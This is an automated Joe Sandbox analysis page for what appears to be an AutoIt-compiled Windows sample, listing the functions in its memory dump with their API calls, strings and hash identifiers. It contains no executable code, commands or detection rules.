Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 85f4eb7334e09bba9ba2a7948a0af7487ea76794171f68fcdb524966bdef8bee
Instruction ID: 573d8758167862ad06fcff7d43a44f4cc5befc7f3e0d6d9cd71a4f1c8cc139e0
Opcode Fuzzy Hash: 85f4eb7334e09bba9ba2a7948a0af7487ea76794171f68fcdb524966bdef8bee
Instruction Fuzzy Hash: 5281D471204300ABD710EF25CC82EABB7A9EF84718F14491EF5559B292DB7CED05CB6A

Function 00441424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eaf5f8e7e80d22eeea28778d1d3061970ba765a16e37d6bd2ef5533b0688c1d
Instruction ID: 3ef477afb8296e2d4b113a85fcd51015cb2b4a78ba707f143d0f92e9d6500e18
Opcode Fuzzy Hash: 4eaf5f8e7e80d22eeea28778d1d3061970ba765a16e37d6bd2ef5533b0688c1d
Instruction Fuzzy Hash: 88715E30900109EFDB14CF59CC49EBFBB79FF85314F14815AF915AA261C738AA51CBA9

Function 004CB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00AD55B8), ref: 004CB3EB
IsWindowEnabled.USER32(00AD55B8), ref: 004CB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 004CB4DB
SendMessageW.USER32(00AD55B8,000000B0,?,?), ref: 004CB512
IsDlgButtonChecked.USER32(?,?), ref: 004CB54F
GetWindowLongW.USER32(00AD55B8,000000EC), ref: 004CB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004CB589

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: df78077146caffc2d2ca187af112e6e1c1b9e34ecb620f55a1a35b5c5c5f355e
Instruction ID: 1b71a9ab7e181d018ffb77c785cb8cfaee2c95b39e07ef4b45ff3be68add7174
Opcode Fuzzy Hash: df78077146caffc2d2ca187af112e6e1c1b9e34ecb620f55a1a35b5c5c5f355e
Instruction Fuzzy Hash: 4A71A138604604EFDB659F55C896FBB7BB9EF09300F14406EE941973A2C739A841DB9C

Function 004BF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004BF448
_memset.LIBCMT ref: 004BF511
ShellExecuteExW.SHELL32(?), ref: 004BF556

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

Part of subcall function 0045FC86: _wcscpy.LIBCMT ref: 0045FCA9

GetProcessId.KERNEL32(00000000), ref: 004BF5CD
CloseHandle.KERNEL32(00000000), ref: 004BF5FC

Strings

@, xrefs: 004BF525

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 091c32e4049451c5239656434f7da54087af08aed7d69ef02322737edf650afc
Instruction ID: 24c8b25d04faddf714de6a91102c4a711e775c28952d388b3aa8cbcecbf788ab
Opcode Fuzzy Hash: 091c32e4049451c5239656434f7da54087af08aed7d69ef02322737edf650afc
Instruction Fuzzy Hash: F161C170A00618DFCB14EF69C8819AEB7F5FF48314F10806EE819AB351CB38AD45CB98

Function 004A0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004A0F8C
GetKeyboardState.USER32(?), ref: 004A0FA1
SetKeyboardState.USER32(?), ref: 004A1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 004A1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 004A104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 004A1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004A10B8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 118475d782abb82f60052295f1b5efb090c22e25237712269a95f0e30720f849
Instruction ID: 5d48cff6d6d31dbb4113db357f46eda28102ff08c2836efb34dadf99b4051c28
Opcode Fuzzy Hash: 118475d782abb82f60052295f1b5efb090c22e25237712269a95f0e30720f849
Instruction Fuzzy Hash: F651F0A06086D53DFB3242348C15BBBBEA95B17304F08858AE1D4969E3C2DCECC8D759

Function 004A0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004A0DA5
GetKeyboardState.USER32(?), ref: 004A0DBA
SetKeyboardState.USER32(?), ref: 004A0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004A0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004A0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004A0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004A0EC9

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: da92455daa494016b7b9c2d31fc0b3fbc9fb10f45d7efe76af039680fbab5007
Instruction ID: 493275d165b19b9c2c1b42d3622b7658ba6d510e0c2eff32160e1e92b10fc733
Opcode Fuzzy Hash: da92455daa494016b7b9c2d31fc0b3fbc9fb10f45d7efe76af039680fbab5007
Instruction Fuzzy Hash: 7051F4A15447D53DFB3283748C45BBBBEA96B17300F08888EF1D4969C2C399EC98E759

Function 004A55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 004A560A
_wcsncpy.LIBCMT ref: 004A563F
_wcsncpy.LIBCMT ref: 004A5671
_wcsncpy.LIBCMT ref: 004A56A4
_wcsncpy.LIBCMT ref: 004A56E6
_wcsncpy.LIBCMT ref: 004A5720
_wcsncpy.LIBCMT ref: 004A574F

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: fdf23af5f2b3547fb64d5ff46380944e5a151a118048b668dd58f5a5de939801
Instruction ID: a09dace93bcb258951c39aec62ca03c529ab50e65af429b9637f7c4c0837fd14
Opcode Fuzzy Hash: fdf23af5f2b3547fb64d5ff46380944e5a151a118048b668dd58f5a5de939801
Instruction Fuzzy Hash: 0E41A165C1061476CB11EFB58C869CFB3B8AF05314F50896BE509E3261FA38E245C7AF

Function 0049D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0049D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0049D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0049D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0049D69D

Strings

DllGetClassObject, xrefs: 0049D610
,,M, xrefs: 0049D578

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,M$DllGetClassObject
API String ID: 753597075-2369237136
Opcode ID: e5694465c8e200c0b3267c9cb033236244d54af87b16ce8bc182507246247286
Instruction ID: 5a1f33e7813a16128b44a125681c8486e86d66f731d359fd26b6c87917c898e6
Opcode Fuzzy Hash: e5694465c8e200c0b3267c9cb033236244d54af87b16ce8bc182507246247286
Instruction Fuzzy Hash: 7F416CB1A00204EFDF05DF64C884A9ABFB9EF54314B1581BAE9099F205D7B9DD44CBA8

Function 004A3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004A3697,?), ref: 004A468B

Part of subcall function 004A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004A3697,?), ref: 004A46A4

lstrcmpiW.KERNEL32(?,?), ref: 004A36B7
_wcscmp.LIBCMT ref: 004A36D3
MoveFileW.KERNEL32(?,?), ref: 004A36EB
_wcscat.LIBCMT ref: 004A3733
SHFileOperationW.SHELL32(?), ref: 004A379F

Strings

\*.*, xrefs: 004A372D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 8abd57598ae04a64265e2b0c654c77e2a6c0db210596ae7a107a9aca3eead10c
Instruction ID: 88d12bb01c9fb2a2ca110a5174137ccd9923648ec4472119b9b1b7b7a501d42a
Opcode Fuzzy Hash: 8abd57598ae04a64265e2b0c654c77e2a6c0db210596ae7a107a9aca3eead10c
Instruction Fuzzy Hash: 5A4191B1508344AEC751EF65C4419DFB7E8AF9A344F40082FB48AC3291FA38D689C75A

Function 004C7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004C72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C7351
IsMenu.USER32(?), ref: 004C7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004C73B1
DrawMenuBar.USER32 ref: 004C73C4

Strings

0, xrefs: 004C729E

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 54de63ad9ddd43e4c3ed6608121ee7b5a2208143939c6dcfbecb98d0efd3686c
Instruction ID: 184dad2e8c466e58c2b3f37574d5a18ad23ef3fc1e2c6aca0b3a9d775fc2e5bf
Opcode Fuzzy Hash: 54de63ad9ddd43e4c3ed6608121ee7b5a2208143939c6dcfbecb98d0efd3686c
Instruction Fuzzy Hash: 21413579A00248EFDB60CF50D884E9ABBB9FB04350F24812AFD05973A0D738AD54EF54

Function 004C0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 004C0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004C0FFE
FreeLibrary.KERNEL32(00000000), ref: 004C10B5

Part of subcall function 004C0FA5: RegCloseKey.ADVAPI32(?), ref: 004C101B
Part of subcall function 004C0FA5: FreeLibrary.KERNEL32(?), ref: 004C106D
Part of subcall function 004C0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004C1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 004C1058

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: bb43b4c655f58d97e5f581ad15293840e416b10d7b7350c3efcc1f888b48ba58
Instruction ID: aa9de9c47ae4b95a43ea63798fe13d0080f09de8eeb86d32a92a5d412757e521
Opcode Fuzzy Hash: bb43b4c655f58d97e5f581ad15293840e416b10d7b7350c3efcc1f888b48ba58
Instruction Fuzzy Hash: 6E311E75900109BFDB55DF91DC89EFFB7BCEF09300F00417EE511A2251DA785E899AA8

Function 004C62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004C62EC
GetWindowLongW.USER32(00AD55B8,000000F0), ref: 004C631F
GetWindowLongW.USER32(00AD55B8,000000F0), ref: 004C6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004C6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004C63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004C63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004C63DB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 5a74d8ac9ff14d4755ec576c898f93fd30d2b254aeab4d99547909705c346070
Instruction ID: a0a6ca1aa26d7ee190d214308dfdb9a41bbeb92f10cfc814e22a0b46105503e7
Opcode Fuzzy Hash: 5a74d8ac9ff14d4755ec576c898f93fd30d2b254aeab4d99547909705c346070
Instruction Fuzzy Hash: BA3137386441909FDB60CF18DC84F5A37E1FB5A714F2A81BAF9008F2B1CB79A845DB59

Function 0049DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0049DB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0049DB54
SysAllocString.OLEAUT32(00000000), ref: 0049DB57
SysAllocString.OLEAUT32(?), ref: 0049DB75
SysFreeString.OLEAUT32(?), ref: 0049DB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 0049DBA3
SysAllocString.OLEAUT32(?), ref: 0049DBB1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 18b68eb52f1f420b4b199067a248196dcac5c4e45d89a48299686ff4e8b7cfd2
Instruction ID: 907c4da9202ef455c8052dff0a5da9a45077f6782c055b497cdd5cb4c48cb082
Opcode Fuzzy Hash: 18b68eb52f1f420b4b199067a248196dcac5c4e45d89a48299686ff4e8b7cfd2
Instruction Fuzzy Hash: 2621C436A00219AFDF10DFA9DC88CBB77ADEF08360B018536F914DB250D678ED458768

Function 004B6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004B7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004B7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004B61C6
WSAGetLastError.WSOCK32(00000000), ref: 004B61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004B620E
connect.WSOCK32(00000000,?,00000010), ref: 004B6217
WSAGetLastError.WSOCK32 ref: 004B6221
closesocket.WSOCK32(00000000), ref: 004B624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 004B6263

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5139a4b0ba066dbec85b5005e3111f439c3c30ad37f4d1744cfa3b8c926a9c80
Instruction ID: 7b2f0cc9fc796ea806f139ddfe3ca1773fd48d67679c6d26d1af657c83789129
Opcode Fuzzy Hash: 5139a4b0ba066dbec85b5005e3111f439c3c30ad37f4d1744cfa3b8c926a9c80
Instruction Fuzzy Hash: 27319231600104ABEF10AF64CC85FBE77ADEB45754F05406AFD0597291DB7CAC099A79

Function 0049F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0049F671
__wcsnicmp.LIBCMT ref: 0049F692
__wcsnicmp.LIBCMT ref: 0049F6AC

Strings

#OnAutoItStartRegister, xrefs: 0049F6A6
#notrayicon, xrefs: 0049F669
#requireadmin, xrefs: 0049F68C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ae9a994fe4216f906f885db5b1355213862a0b2bf82d87b650ecc7b65e40b7ba
Instruction ID: 6d809bb2cff22063eb6258a110f70dda1dd74e7546b54f85b3a1a63078ec783b
Opcode Fuzzy Hash: ae9a994fe4216f906f885db5b1355213862a0b2bf82d87b650ecc7b65e40b7ba
Instruction Fuzzy Hash: 2E21A9722042106ADA20AA71EC02FB77798EF15308F54443FF841C7291FB9CAD4BC29E

Function 004C75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00441D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00441D73
Part of subcall function 00441D35: GetStockObject.GDI32(00000011), ref: 00441D87
Part of subcall function 00441D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00441D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004C7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004C763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004C764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004C7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004C7665

Strings

Msctls_Progress32, xrefs: 004C7603

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c4143a095cd429bf21aa714457447892d8f84e68955361637e6fd5ae63c54564
Instruction ID: b8ed879fcf5e18159a1cf864feac92de0547f470741e3146057453cc7a468886
Opcode Fuzzy Hash: c4143a095cd429bf21aa714457447892d8f84e68955361637e6fd5ae63c54564
Instruction Fuzzy Hash: 0B1193B5210119BFEF118F65CC85FE77F5DEF087A8F114115B604A2160CA76AC21DBA4

Function 00469AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00469AE6

Part of subcall function 00463187: EncodePointer.KERNEL32(00000000), ref: 0046318A
Part of subcall function 00463187: __initp_misc_winsig.LIBCMT ref: 004631A5
Part of subcall function 00463187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00469EA0
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00469EB4
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00469EC7
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00469EDA
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00469EED
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00469F00
Part of subcall function 00463187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00469F13
